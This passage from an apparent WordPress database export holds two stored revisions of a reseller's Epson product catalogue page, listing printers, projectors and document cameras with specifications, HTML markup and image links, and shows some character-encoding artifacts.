resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></h4>\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>\n<h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" />\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 10:51:08','2019-09-26 02:51:08','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3493,1,'2019-09-26 10:52:09','2019-09-26 02:52:09','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></h4>\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>\n<h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" />\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via 